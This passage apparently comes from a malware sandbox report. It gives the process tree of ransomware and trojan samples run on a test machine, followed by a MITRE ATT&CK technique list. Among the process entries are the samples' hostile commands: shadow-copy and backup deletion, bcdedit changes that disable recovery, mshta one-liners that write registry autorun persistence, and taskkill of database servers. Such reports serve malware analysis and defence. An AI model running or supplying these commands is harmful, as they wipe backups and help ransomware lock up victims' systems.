      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9652
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9504
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:1604
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3820
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8404
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3556
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:1072
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9572
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9856
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8848
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9648
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3788
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9360
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3784
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10124
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9468
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5864
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5864 -s 380
      4⤵
      Program crash
      PID:1840
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe
    HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6556
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe
    HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe"
      4⤵
      PID:4228
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
        5⤵
        
        PID:2648
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" runas
        5⤵
        Access Token Manipulation: Create Process with Token
        
        PID:3944
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
        6⤵
        
        PID:4728
      - C:\Users\Admin\AppData\Roaming\sevnz.exe
        
        "C:\Users\Admin\AppData\Roaming\sevnz.exe"
        6⤵
        
        PID:9808
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo',i);}catch(e){}},10);"
        7⤵
        
        PID:10020
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\YGFAN\\HDUUQ'));close();"
        7⤵
        
        PID:10080
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
        8⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
        8⤵
        
        PID:10032
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic SHADOWCOPY DELETE
        9⤵
        
        PID:9600
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
        8⤵
        
        PID:3696
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2316
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
        8⤵
        
        PID:8600
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        8⤵
        
        PID:7136
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
        6⤵
        
        PID:9820
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
    HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:4344
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2316
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
      HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
      4⤵
      PID:7708
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Local\f2dae117-221c-42dd-a511-f6e11a6a70d0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        5⤵
        Modifies file permissions
        
        PID:9132
    - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
        
        "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:5624
      - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
        
        "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        
        PID:7592
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a.exe
    HEUR-Trojan.MSIL.Crypt.gen-3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a.exe
    3⤵
    PID:5496
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-985341027d53e6f9403861d917a3117c7a78dd8a6e13b7cded5537d19ce0cf7a.exe
    HEUR-Trojan.MSIL.Crypt.gen-985341027d53e6f9403861d917a3117c7a78dd8a6e13b7cded5537d19ce0cf7a.exe
    3⤵
    PID:320
  - - C:\Users\Admin\AppData\Local\Temp\fake.exe
      "C:\Users\Admin\AppData\Local\Temp\fake.exe"
      4⤵
      PID:8644
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\fake.exe"
      4⤵
      Views/modifies file attributes
      PID:8656
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-9a0a0c350a8cb3b73b4bdad8e62551a91186b74941f1b06782241d27000b5817.exe
    HEUR-Trojan.MSIL.Crypt.gen-9a0a0c350a8cb3b73b4bdad8e62551a91186b74941f1b06782241d27000b5817.exe
    3⤵
    PID:7964
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.DelShad.gen-9607bb14dd16cc34af77753a5b88baa0315a677a27069b2fe7efd9d68d7397a7.exe
    HEUR-Trojan.MSIL.DelShad.gen-9607bb14dd16cc34af77753a5b88baa0315a677a27069b2fe7efd9d68d7397a7.exe
    3⤵
    PID:8216
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM explorer.exe
      4⤵
      Kills process with taskkill
      PID:4956
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange
      4⤵
      Kills process with taskkill
      PID:8556
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchange
      4⤵
      Kills process with taskkill
      PID:5116
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlserver.exe
      4⤵
      Kills process with taskkill
      PID:7336
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlwriter.exe
      4⤵
      Kills process with taskkill
      PID:8748
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM mysqld.exe
      4⤵
      Kills process with taskkill
      PID:8756
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svcran.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svcran.exe"
      4⤵
      PID:9208
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan.Win32.Kryptik.gen-f707358b901273d58b90fa11b8ac8395c9c5506962f50f8b73ed084ea64e83f2.exe
    HEUR-Trojan.Win32.Kryptik.gen-f707358b901273d58b90fa11b8ac8395c9c5506962f50f8b73ed084ea64e83f2.exe
    3⤵
    PID:8200
  - - C:\Program Files (x86)\gjcsw\dwiu.exe
      "C:\Program Files (x86)\gjcsw\dwiu.exe"
      4⤵
      PID:1064
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.iyjg-fb7807b792c28f5305b9e3db6fb2cc47f8a995d8444a6cdcb38060da08240169.exe
    Trojan-Ransom.Win32.Blocker.iyjg-fb7807b792c28f5305b9e3db6fb2cc47f8a995d8444a6cdcb38060da08240169.exe
    3⤵
    PID:1712
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.jgb-18b504ff04b980a44f40f513e247126bfb0c3330e1f6968813c4aec3636687a0.exe
    Trojan-Ransom.Win32.Blocker.jgb-18b504ff04b980a44f40f513e247126bfb0c3330e1f6968813c4aec3636687a0.exe
    3⤵
    PID:10164
  - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
      \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
      4⤵
      PID:5300
    - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
        
        \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
        5⤵
        
        PID:4236
  - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
      \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
      4⤵
      PID:9300
    - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
        
        \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
        5⤵
        
        PID:768
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.jzec-3a37c244c3d21d29df73b5707f6f684b67c7141686c93899307c7466e6c9c82e.exe
    Trojan-Ransom.Win32.Blocker.jzec-3a37c244c3d21d29df73b5707f6f684b67c7141686c93899307c7466e6c9c82e.exe
    3⤵
    PID:9932
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.mgn-a33bf1f44df944657ed1dd3cf6c1b5985f2dfe68c50140abd5a50149c4d4ed8c.exe
    Trojan-Ransom.Win32.Blocker.mgn-a33bf1f44df944657ed1dd3cf6c1b5985f2dfe68c50140abd5a50149c4d4ed8c.exe
    3⤵
    PID:9244
  - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
      \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
      4⤵
      PID:4940
    - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
        
        \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
        5⤵
        
        PID:9920
  - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
      \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
      4⤵
      PID:320
    - - C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
        
        \\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
        5⤵
        
        PID:4560
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.njwz-5099cc3970683923bf9ae8537dbf41ec6a27426700ec62ba7c81de7068ab35c1.exe
    Trojan-Ransom.Win32.Blocker.njwz-5099cc3970683923bf9ae8537dbf41ec6a27426700ec62ba7c81de7068ab35c1.exe
    3⤵
    PID:9592
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.nlua-a799988bfbf38f7c9005399f089195d79b68ea64c6ed17c4552c043ad92bf426.exe
    Trojan-Ransom.Win32.Blocker.nlua-a799988bfbf38f7c9005399f089195d79b68ea64c6ed17c4552c043ad92bf426.exe
    3⤵
    PID:7772
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.nmtj-b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f.exe
    Trojan-Ransom.Win32.Blocker.nmtj-b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f.exe
    3⤵
    PID:9164
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Crusis.buz-e9e817ad892c6295459c2573c538925bcda3cc36adba56dcf33c8d5217bf0368.exe
    Trojan-Ransom.Win32.Crusis.buz-e9e817ad892c6295459c2573c538925bcda3cc36adba56dcf33c8d5217bf0368.exe
    3⤵
    PID:9252
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Cryptodef.aoo-995063825d8bb75cfb1bf983b0685f6633a27584b1fb88a68a0cb3eba6fc0237.exe
    Trojan-Ransom.Win32.Cryptodef.aoo-995063825d8bb75cfb1bf983b0685f6633a27584b1fb88a68a0cb3eba6fc0237.exe
    3⤵
    PID:9044
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Encoder.qdm-e97be292771a327420e20b36dfd845606fb2f605a4291c10b3300365627f0814.exe
    Trojan-Ransom.Win32.Encoder.qdm-e97be292771a327420e20b36dfd845606fb2f605a4291c10b3300365627f0814.exe
    3⤵
    PID:536
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
    Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
    3⤵
    PID:5336
  - - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
      Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
      4⤵
      PID:4716
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.fbd-043a50ede74186c54cf4f9ff6e878de32a92bcfecffe247d89011c5521da65db.exe
    Trojan-Ransom.Win32.GandCrypt.fbd-043a50ede74186c54cf4f9ff6e878de32a92bcfecffe247d89011c5521da65db.exe
    3⤵
    PID:428
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe
    Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe
    3⤵
    PID:5772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 480
      4⤵
      Program crash
      PID:5176
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GenericCryptor.cys-f82f9d2ba863ed8c4db2d4442678c7355a015150c3bc333fde6652b1c3c930b3.exe
    Trojan-Ransom.Win32.GenericCryptor.cys-f82f9d2ba863ed8c4db2d4442678c7355a015150c3bc333fde6652b1c3c930b3.exe
    3⤵
    PID:7776
- - C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GenericCryptor.czx-87784079f06ec8df763f97a83cc42b434899a7c4336104b59f88e87fc97b03d6.exe
    Trojan-Ransom.Win32.GenericCryptor.czx-87784079f06ec8df763f97a83cc42b434899a7c4336104b59f88e87fc97b03d6.exe
    3⤵
    PID:2204

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2884
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4892

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5864 -ip 5864
1⤵
PID:6756

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2320

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5772 -ip 5772
1⤵
PID:4740

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:8848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery